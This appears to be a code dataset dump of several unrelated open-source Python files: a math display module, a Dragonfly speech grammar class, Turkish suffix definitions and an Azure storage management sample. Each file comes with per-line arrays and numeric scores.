arg.replace('.', ',') if local != "py" and arg == "-0": arg = arg.replace('-0', '0') if local == "all" or local == "imp" or local == "met": arg = arg.replace('E+', '*10^') arg = arg.replace('E-', '*10^-') return arg
[ "# -*- coding: utf-8 -*-\n", "# IMPORTANT CONFIGURE YOUR TEXT EDITOR/IDE TO utf-8 !!!\n", "# @author: \"Evert Provoost\"\n", "# @nickname: \"ElecProg\"\n", "# @pack: \"Math Processing Layer (MPL)\"\n", "# @part: \"Visualization system (MPL.V)\"\n", "# @version: \"v5.0.0\"\n", "# @license: \"GNU General Public License v3\"\n", "\n", "from fractions import Fraction\n", "from decimal import getcontext, Decimal\n", "from .dms import dms as _dms\n", "import math\n", "import time\n", "\n", "\n", "class dms(\n", " _dms): # We would otherwise get a looping import, searching for a fix\n", " def str(self, local=\"all\", dec=\"inf\", acc=False, denom=10000, maxCompT=1):\n", " deg = visual(self.data[0], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", " mnt = visual(self.data[1], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", " sec = visual(self.data[2], local,\n", " {'dec': dec,\n", " 'acc': acc,\n", " 'todms': False}, denom, maxCompT / 3)\n", "\n", " # Yes float since we don't need any precision here.\n", " try:\n", " if float(deg.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " deg = '(' + deg + ')'\n", "\n", " try:\n", " if float(mnt.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " mnt = '(' + mnt + ')'\n", "\n", " try:\n", " if float(sec.replace(',', '.')) < 0:\n", " raise ValueError()\n", "\n", " except ValueError:\n", " sec = '(' + sec + ')'\n", "\n", " if deg == \"0\" and mnt == \"0\" and sec == \"0\":\n", " return \"0\" + \"°\"\n", "\n", " else:\n", " outp = \"\"\n", "\n", " if not deg == \"0\":\n", " outp = outp + deg + \"°\"\n", "\n", " if not mnt == \"0\":\n", " outp = outp + mnt + \"'\"\n", "\n", " if not sec == \"0\":\n", " outp = outp + sec + '\"'\n", "\n", " return outp\n", "\n", "\n", "def Pi():\n", " getcontext().prec += 2\n", " lasts, t, s, n, na, d, da = 0, Decimal(3), 3, 1, 0, 0, 24\n", " while s != lasts:\n", " lasts = s\n", " n, na = n + na, na + 8\n", " d, da = d + da, da + 32\n", " t = (t * n) / d\n", " s += t\n", " getcontext().prec -= 2\n", " return +s\n", "\n", "\n", "def Tau():\n", " return 2 * Pi()\n", "\n", "\n", "def Phi():\n", " return +((1 + Decimal(5).sqrt()) / 2)\n", "\n", "\n", "def E():\n", " getcontext().prec += 2\n", " i, lasts, s, fact, num = 0, 0, 1, Decimal(1), 1\n", " while s != lasts:\n", " lasts = s\n", " i += 1\n", " fact *= i\n", " s += num / fact\n", " getcontext().prec -= 2\n", " return +s\n", "\n", "\n", "def visual(arg,\n", " local=\"all\",\n", " opt={'dec': 'inf',\n", " 'acc': False,\n", " 'todms': False},\n", " denom=10000,\n", " maxCompT=1):\n", " quantizefactor = 10**Decimal(-22)\n", "\n", " if isinstance(arg, bool):\n", " return str(arg)\n", "\n", " elif opt['todms']:\n", " return dms(arg).str(local, opt['dec'], denom)\n", "\n", " elif isinstance(arg, int):\n", " return str(arg)\n", "\n", " arg = Decimal(str(arg))\n", "\n", " if arg.is_nan():\n", " return \"NaN\"\n", "\n", " elif arg == Decimal(\"Infinity\"):\n", " return \"+Inf\"\n", "\n", " elif arg == Decimal(\"-Infinity\"):\n", " return \"-Inf\"\n", "\n", " if not opt['dec'] == \"inf\" and not opt['acc']:\n", " tmp = arg.quantize(10**Decimal(-opt['dec']))\n", " if not math.isnan(tmp):\n", " arg = tmp\n", " else: # The number is not NaN so it's too big\n", " arg = str(arg)\n", " arg, exponent = tuple(arg.split('E'))\n", " arg = Decimal(arg).quantize(10**Decimal(-opt['dec']))\n", " arg = str(arg) + \"E\" + exponent\n", "\n", " elif opt['acc'] and arg < (denom / 100)**3:\n", "\n", " if Decimal(arg.to_integral_exact()) == arg.quantize(quantizefactor):\n", " return str(arg.to_integral_exact())\n", "\n", " frac = Fraction(arg).limit_denominator(int(denom))\n", "\n", " if (Decimal(frac.numerator) / Decimal(frac.denominator)).quantize(\n", " quantizefactor) == arg.quantize(quantizefactor):\n", " return str(frac)\n", "\n", " deno = 1\n", " dent = 1\n", " lst = []\n", " prefix = \"\"\n", "\n", " if arg.is_signed():\n", " arg = abs(arg)\n", " prefix = \"-\"\n", "\n", " pi = Pi()\n", " tau = Tau()\n", " phi = Phi()\n", " e = E()\n", "\n", " startTime = time.time()\n", "\n", " while deno <= denom / 100:\n", "\n", " if time.time() - startTime > maxCompT:\n", " break\n", "\n", " while dent <= denom / 100:\n", " frqtn = Decimal(dent) / Decimal(deno)\n", "\n", " if frqtn not in lst:\n", " lst.append(frqtn)\n", " argsqr = (arg / frqtn)**2\n", " argcub = (arg / frqtn)**3\n", " argpi = (arg / frqtn) / pi\n", " argtau = (arg / frqtn) / tau\n", " arge = (arg / frqtn) / e\n", " argphi = (arg / frqtn) / phi\n", "\n", " if argpi.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"pi\"\n", "\n", " elif frqtn == 2:\n", " return prefix + \"tau\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"pi/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(prefix + str(frac.numerator) + \"pi\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"pi/\" + str(frac.denominator))\n", "\n", " if argtau.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"tau\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"tau/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(\n", " prefix + str(frac.numerator) + \"tau\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"tau/\" + str(frac.denominator))\n", "\n", " elif arge.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"e\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"e/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(prefix + str(frac.numerator) + \"e\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"e/\" + str(frac.denominator))\n", "\n", " elif argphi.quantize(quantizefactor) == 1:\n", " if frqtn == 1:\n", " return prefix + \"phi\"\n", "\n", " else:\n", " frac = Fraction(frqtn).limit_denominator(\n", " int(denom))\n", "\n", " if frac.numerator == 1:\n", " return str(\n", " prefix + \"phi/\" + str(frac.denominator))\n", "\n", " elif frac.denominator == 1:\n", " return str(\n", " prefix + str(frac.numerator) + \"phi\")\n", "\n", " else:\n", " return str(prefix + str(frac.numerator) +\n", " \"phi/\" + str(frac.denominator))\n", "\n", " elif Decimal(\n", " argsqr.to_integral_exact()) == argsqr.quantize(\n", " quantizefactor):\n", " outside_root = 1\n", " inside_root = Decimal(argsqr.to_integral_exact())\n", " d = 2\n", "\n", " while (d**2 <= inside_root):\n", " if (inside_root % (d**2) == 0):\n", " inside_root = inside_root / (d**2)\n", " outside_root = outside_root * d\n", "\n", " else:\n", " d = d + 1\n", "\n", " outside_root *= frqtn\n", "\n", " if inside_root == 1:\n", " return prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom)))\n", "\n", " elif outside_root == 1:\n", " return (\n", " prefix + \"v\" + str(argsqr.to_integral_exact()))\n", "\n", " elif outside_root == 0 or inside_root == 0:\n", " return (\"0\")\n", "\n", " else:\n", " return (prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom))) + \"*v\" +\n", " str(inside_root.to_integral_exact()))\n", "\n", " elif Decimal(\n", " argcub.to_integral_exact()) == argcub.quantize(\n", " quantizefactor):\n", " outside_root = 1\n", " inside_root = Decimal(argcub.to_integral_exact())\n", " d = 2\n", "\n", " while (d**3 <= inside_root):\n", " if (inside_root % (d**3) == 0):\n", " inside_root = inside_root / (d**3)\n", " outside_root = outside_root * d\n", "\n", " else:\n", " d = d + 1\n", "\n", " outside_root *= frqtn\n", "\n", " if inside_root == 1:\n", " return prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom)))\n", "\n", " elif outside_root == 1:\n", " return (prefix + \"³v\" +\n", " str(argcub.to_integral_exact()))\n", "\n", " elif outside_root == 0 or inside_root == 0:\n", " return (\"0\")\n", "\n", " else:\n", " return (prefix + str(\n", " Fraction(outside_root).limit_denominator(\n", " int(denom))) + \"*³v\" +\n", " str(int(inside_root)))\n", "\n", " dent += 1\n", "\n", " dent = 1\n", " deno += 1\n", "\n", " if not opt['dec'] == \"inf\":\n", " arg = Decimal(str(arg)).quantize(10**Decimal(-opt['dec']))\n", "\n", " if prefix == \"-\":\n", " arg = -arg\n", "\n", " arg = str(arg)\n", " arg = arg.rstrip('0').rstrip('.') if '.' in arg else arg\n", "\n", " if local == \"all\" or local == \"met\":\n", " arg = arg.replace('.', ',')\n", "\n", " if local != \"py\" and arg == \"-0\":\n", " arg = arg.replace('-0', '0')\n", "\n", " if local == \"all\" or local == \"imp\" or local == \"met\":\n", " arg = arg.replace('E+', '*10^')\n", " arg = arg.replace('E-', '*10^-')\n", "\n", " return arg\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
364
0
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ This file implements the ConnectionGrammar class. """ from win32com.client import Dispatch from pywintypes import com_error from dragonfly.grammar.grammar_base import Grammar #--------------------------------------------------------------------------- class ConnectionGrammar(Grammar): """ Grammar class for maintaining a COM connection well within a given context. This is useful for controlling applications through COM while they are in the foreground. This grammar class will take care of dispatching the correct COM interface when the application comes to the foreground, and releasing it when the application is no longer there. * ``name`` -- name of this grammar. * ``description`` -- description for this grammar. * ``context`` -- context within which to maintain the COM connection. * ``app_name`` -- COM name to dispatch. """ def __init__(self, name, description=None, context=None, app_name=None): assert isinstance(app_name, basestring) or app_name == None self._app_name = app_name self._application = None Grammar.__init__(self, name=name, description=description, context=context) def __del__(self): try: self.disconnect() except Exception, error: pass #----------------------------------------------------------------------- # Methods for context management. application = property(lambda self: self._application, doc="COM handle to the application.") def enter_context(self): if self.connect(): self.connection_up() return True else: return False def exit_context(self): [r.deactivate() for r in self._rules if r.active] self.disconnect() self.connection_down() def _process_begin(self, executable, title, handle): # If not connected yet, retry. If the connection fails after # single attempt, give up. if not self._application: if not self.connect(): return False self.connection_up() return True #----------------------------------------------------------------------- # Methods for managing the application connection. def connect(self): if not self._app_name: return True try: self._application = Dispatch(self._app_name) except com_error, e: if self._log_begin: self._log_begin.warning("Grammar %s: failed to" " connect to %r: %s." % (self, self._app_name, e)) return False else: [r.activate() for r in self._rules if not r.active] return True def disconnect(self): self._application = None def connection_up(self): """ Method called immediately after entering this instance's context and successfully setting up its connection. By default this method doesn't do anything. This method should be overridden by derived classes if they need to synchronize some internal state with the application. The COM connection is available through the ``self.application`` attribute. """ pass def connection_down(self): """ Method called immediately after exiting this instance's context and disconnecting from the application. By default this method doesn't do anything. This method should be overridden by derived classes if they need to clean up after disconnection. """ pass
[ "#\r\n", "# This file is part of Dragonfly.\r\n", "# (c) Copyright 2007, 2008 by Christo Butcher\r\n", "# Licensed under the LGPL.\r\n", "#\r\n", "# Dragonfly is free software: you can redistribute it and/or modify it \r\n", "# under the terms of the GNU Lesser General Public License as published \r\n", "# by the Free Software Foundation, either version 3 of the License, or \r\n", "# (at your option) any later version.\r\n", "#\r\n", "# Dragonfly is distributed in the hope that it will be useful, but \r\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU \r\n", "# Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with Dragonfly. If not, see \r\n", "# <http://www.gnu.org/licenses/>.\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", " This file implements the ConnectionGrammar class.\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "from win32com.client import Dispatch\r\n", "from pywintypes import com_error\r\n", "\r\n", "from dragonfly.grammar.grammar_base import Grammar\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "class ConnectionGrammar(Grammar):\r\n", " \"\"\"\r\n", " Grammar class for maintaining a COM connection well \r\n", " within a given context. This is useful for controlling \r\n", " applications through COM while they are in the \r\n", " foreground. This grammar class will take care of \r\n", " dispatching the correct COM interface when the \r\n", " application comes to the foreground, and releasing it \r\n", " when the application is no longer there.\r\n", "\r\n", " * ``name`` -- name of this grammar.\r\n", " * ``description`` -- description for this grammar.\r\n", " * ``context`` -- context within which to maintain\r\n", " the COM connection.\r\n", " * ``app_name`` -- COM name to dispatch.\r\n", " \"\"\"\r\n", "\r\n", " def __init__(self, name, description=None, context=None, app_name=None):\r\n", " assert isinstance(app_name, basestring) or app_name == None\r\n", " self._app_name = app_name\r\n", " self._application = None\r\n", " Grammar.__init__(self, name=name, description=description,\r\n", " context=context)\r\n", "\r\n", " def __del__(self):\r\n", " try:\r\n", " self.disconnect()\r\n", " except Exception, error:\r\n", " pass\r\n", "\r\n", " #-----------------------------------------------------------------------\r\n", " # Methods for context management.\r\n", "\r\n", " application = property(lambda self: self._application,\r\n", " doc=\"COM handle to the application.\")\r\n", "\r\n", " def enter_context(self):\r\n", " if self.connect():\r\n", " self.connection_up()\r\n", " return True\r\n", " else:\r\n", " return False\r\n", "\r\n", " def exit_context(self):\r\n", " [r.deactivate() for r in self._rules if r.active]\r\n", " self.disconnect()\r\n", " self.connection_down()\r\n", "\r\n", " def _process_begin(self, executable, title, handle):\r\n", " # If not connected yet, retry. If the connection fails after\r\n", " # single attempt, give up.\r\n", " if not self._application:\r\n", " if not self.connect():\r\n", " return False\r\n", " self.connection_up()\r\n", " return True\r\n", "\r\n", " #-----------------------------------------------------------------------\r\n", " # Methods for managing the application connection.\r\n", "\r\n", " def connect(self):\r\n", " if not self._app_name:\r\n", " return True\r\n", " try:\r\n", " self._application = Dispatch(self._app_name)\r\n", " except com_error, e:\r\n", " if self._log_begin:\r\n", " self._log_begin.warning(\"Grammar %s: failed to\"\r\n", " \" connect to %r: %s.\"\r\n", " % (self, self._app_name, e))\r\n", " return False\r\n", " else:\r\n", " [r.activate() for r in self._rules if not r.active]\r\n", " return True\r\n", "\r\n", " def disconnect(self):\r\n", " self._application = None\r\n", "\r\n", " def connection_up(self):\r\n", " \"\"\"\r\n", " Method called immediately after entering this \r\n", " instance's context and successfully setting up its \r\n", " connection.\r\n", "\r\n", " By default this method doesn't do anything.\r\n", " This method should be overridden by derived classes \r\n", " if they need to synchronize some internal state with \r\n", " the application. The COM connection is available \r\n", " through the ``self.application`` attribute.\r\n", " \"\"\"\r\n", " pass\r\n", "\r\n", " def connection_down(self):\r\n", " \"\"\"\r\n", " Method called immediately after exiting this \r\n", " instance's context and disconnecting from the \r\n", " application.\r\n", "\r\n", " By default this method doesn't do anything.\r\n", " This method should be overridden by derived classes \r\n", " if they need to clean up after disconnection.\r\n", " \"\"\"\r\n", " pass\r\n" ]
[ 0, 0, 0, 0, 0, 0.013333333333333334, 0.013157894736842105, 0.013333333333333334, 0, 0, 0.014084507042253521, 0.015384615384615385, 0.013888888888888888, 0, 0, 0.014084507042253521, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0.016129032258064516, 0.015151515151515152, 0.017543859649122806, 0.016666666666666666, 0.017543859649122806, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.015384615384615385, 0, 0, 0, 0.015151515151515152, 0.014925373134328358, 0.015625, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0.016666666666666666, 0, 0, 0, 0.015151515151515152, 0, 0, 0 ]
136
0.00291
false
#-*- coding: utf-8 -*- from . import Suffix S11 = Suffix("-cAsInA", "casına|çasına|cesine|çesine", None, True) S4 = Suffix("-sUnUz", "sınız|siniz|sunuz|sünüz", None, True) S14 = Suffix("-(y)mUş", "muş|miş|müş|mış", "y", True) S15 = Suffix("-(y)ken", "ken", "y", True) S2 = Suffix("-sUn", "sın|sin|sun|sün", None, True) S5 = Suffix("-lAr", "lar|ler", None, True) S9 = Suffix("-nUz", "nız|niz|nuz|nüz", None, True) S10 = Suffix("-DUr", "tır|tir|tur|tür|dır|dir|dur|dür", None, True) S3 = Suffix("-(y)Uz", "ız|iz|uz|üz", "y", True) S1 = Suffix("-(y)Um", "ım|im|um|üm", "y", True) S12 = Suffix("-(y)DU", "dı|di|du|dü|tı|ti|tu|tü", "y", True) S13 = Suffix("-(y)sA", "sa|se", "y", True) S6 = Suffix("-m", "m", None, True) S7 = Suffix("-n", "n", None, True) S8 = Suffix("-k", "k", None, True) # The order of the enum definition determines the priority of the suffix. # For example, -(y)ken (S15 suffix) is checked before -n (S7 suffix). VALUES = (S11,S4,S14,S15,S2,S5,S9,S10,S3,S1,S12,S13,S6,S7,S8)
[ "#-*- coding: utf-8 -*-\n", "\n", "from . import Suffix\n", "\n", "S11 = Suffix(\"-cAsInA\", \"casına|çasına|cesine|çesine\", None, True)\n", "S4 = Suffix(\"-sUnUz\", \"sınız|siniz|sunuz|sünüz\", None, True)\n", "S14 = Suffix(\"-(y)mUş\", \"muş|miş|müş|mış\", \"y\", True)\n", "S15 = Suffix(\"-(y)ken\", \"ken\", \"y\", True)\n", "S2 = Suffix(\"-sUn\", \"sın|sin|sun|sün\", None, True)\n", "S5 = Suffix(\"-lAr\", \"lar|ler\", None, True)\n", "S9 = Suffix(\"-nUz\", \"nız|niz|nuz|nüz\", None, True)\n", "S10 = Suffix(\"-DUr\", \"tır|tir|tur|tür|dır|dir|dur|dür\", None, True)\n", "S3 = Suffix(\"-(y)Uz\", \"ız|iz|uz|üz\", \"y\", True)\n", "S1 = Suffix(\"-(y)Um\", \"ım|im|um|üm\", \"y\", True)\n", "S12 = Suffix(\"-(y)DU\", \"dı|di|du|dü|tı|ti|tu|tü\", \"y\", True)\n", "S13 = Suffix(\"-(y)sA\", \"sa|se\", \"y\", True)\n", "S6 = Suffix(\"-m\", \"m\", None, True)\n", "S7 = Suffix(\"-n\", \"n\", None, True)\n", "S8 = Suffix(\"-k\", \"k\", None, True)\n", "\n", "# The order of the enum definition determines the priority of the suffix.\n", "# For example, -(y)ken (S15 suffix) is checked before -n (S7 suffix).\n", "VALUES = (S11,S4,S14,S15,S2,S5,S9,S10,S3,S1,S12,S13,S6,S7,S8)" ]
[ 0.043478260869565216, 0, 0, 0, 0, 0.013333333333333334, 0, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0, 0.013333333333333334, 0.013333333333333334, 0, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0, 0, 0, 0.2459016393442623 ]
23
0.017799
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- from datetime import datetime, timedelta from base64 import b64decode from azure.mgmt.resource.resources import ( ResourceManagementClient, ) from azure.mgmt.resource.subscriptions import ( SubscriptionClient, ) from azure.mgmt.storage import ( StorageManagementClient, ) from azure.mgmt.storage.models import ( StorageAccountCreateParameters, ) from azure.mgmt.compute import ( ComputeManagementClient, ) from azure.mgmt.network import ( NetworkManagementClient, ) from azure.storage import AccessPolicy, CloudStorageAccount, SharedAccessPolicy from azure.storage.blob import BlobService, BlobSharedAccessPermissions from azure.storage.file import FileService from azure.storage.queue import QueueService from azure.storage.table import TableService from . import storage_extensions # Add some extensions to the service classes # This functionality will eventually be part of the SDK FileService.iterate_shares = storage_extensions.iterate_shares BlobService.iterate_containers = storage_extensions.iterate_containers BlobService.iterate_blobs = storage_extensions.iterate_blobs QueueService.iterate_queues = storage_extensions.iterate_queues TableService.iterate_tables = storage_extensions.iterate_tables class AccountDetails(object): def __init__(self, subscriptions=None, tenants=None): self.subscriptions = subscriptions self.tenants = tenants class SubscriptionDetails(object): def __init__(self, resource_groups=None, providers=None): self.resource_groups = resource_groups self.providers = providers class ResourceGroupDetails(object): def __init__(self, storage_accounts=None, storage_accounts_locations=None, vms=None, public_ip_addresses=None, virtual_networks=None): self.storage_accounts = storage_accounts self.storage_accounts_locations = storage_accounts_locations self.vms = vms self.public_ip_addresses = public_ip_addresses self.virtual_networks = virtual_networks class StorageAccountDetails(object): def __init__(self, account_props=None, account_keys=None, blob_containers=None, shares=None, tables=None, queues=None, blob_service_properties=None, queue_service_properties=None, table_service_properties=None): self.account_props = account_props self.account_keys = account_keys self.blob_containers = blob_containers self.shares = shares self.tables = tables self.queues = queues self.blob_service_properties = blob_service_properties self.queue_service_properties = queue_service_properties self.table_service_properties = table_service_properties class StorageAccountContainerDetails(object): def __init__(self, container_name=None, sas_policy=None, blobs=None): self.container_name = container_name self.sas_policy = sas_policy self.blobs = blobs class StorageAccountQueueDetails(object): def __init__(self, queue_name=None, metadata=None, messages=None): self.queue_name = queue_name self.metadata = metadata self.messages = messages class StorageAccountTableDetails(object): def __init__(self, table_name=None, entities=None, custom_fields=None): self.table_name = table_name self.entities = entities self.custom_fields = custom_fields class VMDetails(object): def __init__(self, name=None, vm=None): self.name = name self.vm = vm class VirtualNetworkDetails(object): def __init__(self, name=None, network=None): self.name = name self.network = network def get_account_details(creds): subscription_client = SubscriptionClient(creds) model = AccountDetails() model.subscriptions = list(subscription_client.subscriptions.list()) model.tenants = list(subscription_client.tenants.list()) return model def get_subscription_details(subscription_id, creds): resource_client = ResourceManagementClient(creds, subscription_id) model = SubscriptionDetails() model.resource_groups = list(resource_client.resource_groups.list()) model.providers = list(resource_client.providers.list()) return model def get_resource_group_details(subscription_id, creds, resource_group_name): storage_client = StorageManagementClient(creds, subscription_id) resource_client = ResourceManagementClient(creds, subscription_id) compute_client = ComputeManagementClient(creds, subscription_id) network_client = NetworkManagementClient(creds, subscription_id) model = ResourceGroupDetails() model.storage_accounts = list(storage_client.storage_accounts.list_by_resource_group(resource_group_name)) provider = resource_client.providers.get('Microsoft.Storage') resource_type = [r for r in provider.resource_types if r.resource_type == 'storageAccounts'][0] model.storage_accounts_locations = resource_type.locations # TODO: make an iterate function model.vms = list(compute_client.virtual_machines.list(resource_group_name)) model.public_ip_addresses = list(network_client.public_ip_addresses.list(resource_group_name)) model.virtual_networks = list(network_client.virtual_networks.list(resource_group_name)) return model def get_vm_details(subscription_id, creds, resource_group_name, vm_name): compute_client = ComputeManagementClient(creds, subscription_id) model = VMDetails( name=vm_name, vm=compute_client.virtual_machines.get(resource_group_name, vm_name), ) return model def get_virtual_network_details(subscription_id, creds, resource_group_name, network_name): network_client = NetworkManagementClient(creds, subscription_id) model = VirtualNetworkDetails( name=network_name, network=network_client.virtual_networks.get(resource_group_name, network_name), ) return model def get_storage_account_details(subscription_id, creds, resource_group_name, account_name): storage_client = StorageManagementClient(creds, subscription_id) account_result = storage_client.storage_accounts.get_properties( resource_group_name, account_name, ) storage_account_keys = storage_client.storage_accounts.list_keys( resource_group_name, account_name, ) account_key = storage_account_keys.key1 account = CloudStorageAccount(account_name, account_key) blob_service = account.create_blob_service() file_service = account.create_file_service() queue_service = account.create_queue_service() table_service = account.create_table_service() model = StorageAccountDetails() model.account_props = account_result model.account_keys = storage_account_keys model.blob_containers = blob_service.iterate_containers() model.queues = queue_service.iterate_queues() #TODO: find out why listing shares doesn't work #model.shares = file_service.iterate_shares() model.shares = [] model.tables = table_service.iterate_tables() model.blob_service_properties = blob_service.get_blob_service_properties() model.queue_service_properties = queue_service.get_queue_service_properties() model.table_service_properties = table_service.get_table_service_properties() return model def _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name): storage_client = StorageManagementClient(creds, subscription_id) storage_account_keys = storage_client.storage_accounts.list_keys( resource_group_name, account_name, ) return storage_account_keys def get_container_details(subscription_id, creds, resource_group_name, account_name, container_name): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) blob_service = BlobService(account_name, keys.key1) model = StorageAccountContainerDetails() model.container_name = container_name model.sas_policy = _get_shared_access_policy(BlobSharedAccessPermissions.READ) model.blobs = [] for blob in blob_service.iterate_blobs(container_name, include='metadata'): sas_token = blob_service.generate_shared_access_signature(container_name, blob.name, model.sas_policy) blob.sas_url = blob_service.make_blob_url(container_name, blob.name, sas_token=sas_token) raw_md5 = b64decode(blob.properties.content_md5) hex_md5 = ''.join([hex(val)[2:] for val in raw_md5]) blob.properties.content_hex_md5 = hex_md5 model.blobs.append(blob) return model def _get_shared_access_policy(permission): date_format = "%Y-%m-%dT%H:%M:%SZ" start = datetime.utcnow() - timedelta(minutes=1) expiry = start + timedelta(hours=1) return SharedAccessPolicy( AccessPolicy( start.strftime(date_format), expiry.strftime(date_format), permission, ) ) def get_queue_details(subscription_id, creds, resource_group_name, account_name, queue_name): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) queue_service = QueueService(account_name, keys.key1) model = StorageAccountQueueDetails() model.queue_name = queue_name model.metadata = queue_service.get_queue_metadata(queue_name) count = int(model.metadata.get('x-ms-approximate-messages-count', '0')) model.messages = queue_service.peek_messages(queue_name, count) if count else [] for msg in model.messages: try: msg.decoded_text = b64decode(msg.message_text).decode() except: msg.decoded_text = None return model def get_table_details(subscription_id, creds, resource_group_name, account_name, table_name, next_partition_key=None, next_row_key=None): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) table_service = TableService(account_name, keys.key1) model = StorageAccountTableDetails() model.table_name = table_name model.entities = table_service.query_entities( table_name, top=3, # small to demonstrate continuations next_partition_key=next_partition_key, next_row_key=next_row_key, ) model.custom_fields = _get_entities_custom_fields(model.entities) return model def _get_entities_custom_fields(entities): '''Get the union of all custom fields in the specified entities.''' custom_fields = set() for entity in entities: fields = dir(entity) for field in fields: if not field.startswith('_'): custom_fields.add(field) for skip_field in ['PartitionKey', 'RowKey', 'Timestamp', 'etag']: 